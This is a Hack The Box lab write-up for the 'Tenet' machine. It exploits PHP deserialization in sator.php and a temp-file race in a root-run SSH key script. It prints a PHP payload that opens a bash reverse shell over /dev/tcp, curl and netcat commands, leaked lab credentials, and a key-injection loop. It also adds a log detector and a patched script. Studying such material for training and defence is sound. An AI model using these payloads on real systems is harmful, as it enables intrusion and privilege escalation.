HTB Tenet Writeup

INFO

Machine IP = 10.10.10.223
OS = Linux
Level = MEDIUM
Points = 30

Write the IP of the machine to your /etc/hosts file

echo "10.10.10.223 tenet.htb" >> /etc/hosts

Scanning

nmap -sC -sV 10.10.10.223

Enumeration

Port 80 – WordPress Blog

Create a directory tenet, cd into it, and run Gobuster:

gobuster dir -u http://10.10.10.223 -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,js -t 80 -o gobuster.log
  1. -x, --extensions string   File extension(s) to search for
  2. -t, --threads int         Number of concurrent threads (default 10)

On the /wordpress page we notice a post called Migration with a comment by the user neil:

did you remove the sator php file and the backup?? the migration program is incomplete!
why would you do this?!

It seems there is a file called sator.php and a backup of it. Add sator.tenet.htb to the /etc/hosts file and navigate to the URL

http://10.10.10.223/sator.php

we see this:

[+] Grabbing users from text file
[] Database updated

So the PHP file is there and it is being executed. Since the user neil mentioned a backup file, let's try to download it:

wget http://sator.tenet.htb/sator.php.bak

After downloading sator.php.bak, rename it to sator.php.

Let’s check the code:

<?php
// sator.php (restored from sator.php.bak)

class DatabaseExport
{
    public $user_file = 'users.txt';
    public $data = '';

    public function update_db()
    {
        echo '[+] Grabbing users from text file <br>';
        $this->data = 'Success';
    }

    public function __destruct()
    {
        file_put_contents(__DIR__ . '/' . $this->user_file, $this->data);
        echo '[] Database updated <br>';
        // echo 'Gotta get this working properly...';
    }
}

$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);

$app = new DatabaseExport;
$app->update_db();

?>

We see that the script reads the GET parameter arepo and passes it straight to unserialize(). Because the class has a __destruct() method that writes $data to a file named by $user_file, any object we serialize is written to disk when it is destroyed. To exploit this, let's look at Exploiting PHP Deserialization.

To write the exploit, we do the following:

  1. Write the class DatabaseExport on our local machine, set user_file to a PHP file name and data to a PHP reverse shell pointing at our local machine.
  2. Serialize it and URL-encode it to pass to the GET parameter.

Now, open a php interactive cli using:

php -a

Write the following:

class DatabaseExport {
  public $user_file = 'exploit.php';
  public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/<Your IP address>/<Port for reverse connection> 0>&1\'"); ?>';
}

print urlencode(serialize(new DatabaseExport));

The payload is generated. Copy the URL-encoded output and make the request using curl (quote the URL so the shell does not interpret the ? and the placeholder brackets):

curl -i 'http://sator.tenet.htb/sator.php?arepo=<Add URL encoded output here>'

Open a nc listener on the port you put in the payload:

nc -nvlp <Your Port>

then get a reverse shell by browsing to:

http://10.10.10.223/exploit.php

Now we have a reverse shell
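From the defender's side, the request above leaves a recognizable trace in the web server access log: a serialized object token in a query string. The script below is an added example, not part of the original writeup; it flags such requests and lists the class names they carry. The log lines are constructed for this example (the payload's data field is a harmless placeholder), and the sator.php, arepo and DatabaseExport names come from the box.

```bash
#!/bin/sh
# Added example, not part of the original writeup: flag access-log requests that
# carry a PHP serialized object in their query string and report the class name.
# Input format: combined access log on stdin. SAMPLE_LOG is constructed data.

SAMPLE_LOG='10.10.14.5 - - [12/Jan/2021:10:00:01 +0000] "GET /sator.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Jan/2021:10:00:07 +0000] "GET /sator.php?arepo=O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A11%3A%22exploit.php%22%3Bs%3A4%3A%22data%22%3Bs%3A3%3A%22abc%22%3B%7D HTTP/1.1" 200 512 "-" "curl/7.74.0"
10.10.14.5 - - [12/Jan/2021:10:00:09 +0000] "GET /exploit.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.7 - - [12/Jan/2021:10:05:00 +0000] "GET /index.php?s=O%3A%3Afoo HTTP/1.1" 200 9000 "-" "Mozilla/5.0"'

# serialize() writes an object as  O:<len>:"<Class>":<n>:{...}. After PHP's
# urlencode() the ':' becomes %3A and the '"' becomes %22, so both spellings are
# matched; the <len> digits are required, which keeps "O%3A%3Afoo" from matching.
OBJ_RE='O(:|%3[aA])[0-9]+(:|%3[aA])("|%22)[A-Za-z0-9_]+("|%22)'

# Print only the log lines whose GET/POST request line carries a serialized object.
flag_serialized_objects() {
    grep -E "\"(GET|POST) [^\"]*${OBJ_RE}"
}

# Print the class name from each flagged line, decoded, one per line.
serialized_classes() {
    flag_serialized_objects |
        grep -Eo "$OBJ_RE" |
        sed -E 's/%3[aA]/:/g; s/%22/"/g' |
        sed -E 's/^O:[0-9]+:"([A-Za-z0-9_]+)"$/\1/'
}

# Number of flagged lines: a quick "is there anything to look at" check.
count_flagged() {
    flag_serialized_objects | wc -l | tr -d ' '
}

# Demo on the constructed sample: prints "DatabaseExport".
printf '%s\n' "$SAMPLE_LOG" | serialized_classes
```

A follow-up request from the same client to a freshly created .php file (the third sample line) is the second half of the pattern and is worth correlating by hand once a class name shows up.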

Privilege Escalation

Checking the /wordpress directory, we find credentials: cat wp-config.php shows this DB configuration

define( 'DB_USER', 'neil' );
define( 'DB_PASSWORD', 'Opera2112' );

SSH into the box with these credentials:
user: neil
password: Opera2112

Getting Root

Check our privileges as the user neil:

neil@tenet:/$ sudo -l

User neil may run the following commands on tenet:
    (ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh

Checking this file /usr/local/bin/enableSSH.sh, we see the following function:

addKey() {

        tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)

        (umask 110; touch $tmpName)

        /bin/echo $key >>$tmpName

        checkFile $tmpName

        /bin/cat $tmpName >>/root/.ssh/authorized_keys

        /bin/rm $tmpName

}

The script:

  1. Generates an SSH key pair and writes the public key (id_rsa.pub) to the file /tmp/ssh-XXXXXXXX
  2. Appends the contents of this file to /root/.ssh/authorized_keys
  3. Deletes the tmp file

Note that mktemp -u only picks a name (it does not create the file) and umask 110 leaves the file world-writable, so anything written into /tmp/ssh-* between the write and the cat ends up in root's authorized_keys. Let's do the 3 steps to exploit this.

Step 1

First create an SSH key pair on your local machine using ssh-keygen, then run the following loop as neil:

neil@tenet:/$ while true; do echo "YOUR id_rsa.pub key" | tee /tmp/ssh-*; done

This continuously writes your public key into every /tmp/ssh-* file that appears.

Step 2

Run the enableSSH.sh script repeatedly until we get a success message:

neil@tenet:/etc/ssh$ sudo /usr/local/bin/enableSSH.sh
Error in adding root@ubuntu to authorized_keys file!
neil@tenet:/etc/ssh$ sudo /usr/local/bin/enableSSH.sh
Error in adding root@ubuntu to authorized_keys file!
neil@tenet:/etc/ssh$ sudo /usr/local/bin/enableSSH.sh
Successfully added root@ubuntu to authorized_keys file!

Step 3

On your local host:

kali@kali:~/.ssh$ chmod 600 id_rsa

Then SSH into the tenet box as root:

kali@kali:~/.ssh$ ssh -i id_rsa root@tenet.htb

Done!
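For completeness, here is what closes the race on the script side. This is an added example, not the box's enableSSH.sh: a rewrite of addKey() that creates the temp file atomically with mktemp (no -u) under umask 077 and validates the key before appending it. The function takes the key line and the authorized_keys path as arguments, and the key used below is a constructed sample, not a real one.

```bash
#!/bin/sh
# Added example, not the box's enableSSH.sh: addKey() without the race.
#   - mktemp WITHOUT -u creates the file (mode 0600) instead of only naming it,
#     so there is no moment where the name exists but the file does not;
#   - umask 077 instead of 110 (110 still yields a world-writable file);
#   - the key is checked before anything touches the destination.
# $1 = one OpenSSH public-key line, $2 = authorized_keys path.
# Assumption: the caller passes a path it may write (the test uses a temp dir).
add_key_safe() {
    key=$1
    dest=$2

    # Exactly one line: type, base64 blob, optional comment.
    [ "$(printf '%s\n' "$key" | wc -l | tr -d ' ')" = 1 ] || {
        echo "rejected: key must be a single line" >&2; return 1; }
    printf '%s\n' "$key" |
      grep -Eq '^(ssh-ed25519|ssh-rsa|ecdsa-sha2-nistp(256|384|521)) [A-Za-z0-9+/]+=*( [^[:space:]]+)?$' || {
        echo "rejected: not an OpenSSH public key" >&2; return 1; }

    # Private temp file, created (not just named) by mktemp; nobody else can
    # write to it, so what is read back is exactly what was written.
    tmpName=$(umask 077; mktemp "${TMPDIR:-/tmp}/ssh-XXXXXXXX") || return 1
    printf '%s\n' "$key" > "$tmpName"

    # Destination is created 0600 if absent, then the validated key is appended.
    (umask 077; touch "$dest") || { rm -f "$tmpName"; return 1; }
    cat "$tmpName" >> "$dest"
    rm -f "$tmpName"
}
```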


This post is licensed under CC BY 4.0 by the author.